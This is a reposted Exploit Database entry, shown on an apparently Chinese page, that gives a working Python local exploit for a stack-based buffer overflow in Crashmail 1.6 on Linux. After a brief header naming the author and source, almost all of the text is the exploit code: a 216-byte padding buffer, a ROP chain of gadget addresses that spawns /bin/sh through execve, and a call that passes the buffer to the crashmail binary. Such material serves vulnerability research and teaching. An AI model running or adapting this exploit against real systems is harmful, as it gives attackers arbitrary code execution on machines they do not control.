Crashmail 1.6 – Stack-Based Buffer Overflow (ROP)

• Exploit Database
• 100 阅读

• 作者： Juan Sacco
  日期： 2018-03-23
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/44331/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  # Exploit author: Juan Sacco <jsacco@exploitpack.com> # Website: http://exploitpack.com # # Description: Crashmail is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user supplied input. # Impact: An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition. # Vendor homepage: http://ftnapps.sourceforge.net/crashmail.html # Affected version: 1.6 ( Latest )   import os, subprocess from struct import pack   p = lambda x : pack(&apos;I&apos;, x) IMAGE_BASE_0 = 0x08048000 # ./crashmail rebase_0 = lambda x : p(x + IMAGE_BASE_0)   # Control of EIP at 216 # ROP chain: execve ( binsh ) # Static-linked junk = &apos;A&apos;*216 # Fill ropchain = rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret; ropchain += &apos;//bi&apos; ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret; ropchain += rebase_0(0x000e9060) ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret; ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret; ropchain += &apos;n/sh&apos; ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret; ropchain += rebase_0(0x000e9064) ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret; ropchain += rebase_0(0x000391a0) # 0x080811a0: xor eax, eax; ret; ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret; ropchain += rebase_0(0x000e9068) ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret; ropchain += rebase_0(0x000001f9) # 0x080481f9: pop ebx; ret; ropchain += rebase_0(0x000e9060) ropchain += rebase_0(0x000e0e80) # 0x08128e80: pop ecx; push cs; adc al, 0x41; ret; ropchain += rebase_0(0x000e9068) ropchain += rebase_0(0x000705aa) # 0x080b85aaop edx; ret; ropchain += rebase_0(0x000e9068) ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret; ropchain += p(0xfffffff5) ropchain += rebase_0(0x00051dc7) # 0x08099dc7: neg eax; ret; ropchain += rebase_0(0x00070e80) # 0x080b8e80: int 0x80; ret; evil_buffer = junk + ropchain   print "[*] Exploit Pack http://exploitpack.com - Author: jsacco@exploitpack.com" print "[*] Crashmail 1.6 - BoF ( ROP execve)" print "[?] Payload can be read trough a file or STDIN"   try: subprocess.call(["./crashmail","SETTINGS", evil_buffer]) except OSError as e: if e.errno == os.errno.ENOENT: print "[!] Crashmail not found" else: print "[*] Error executing exploit" raise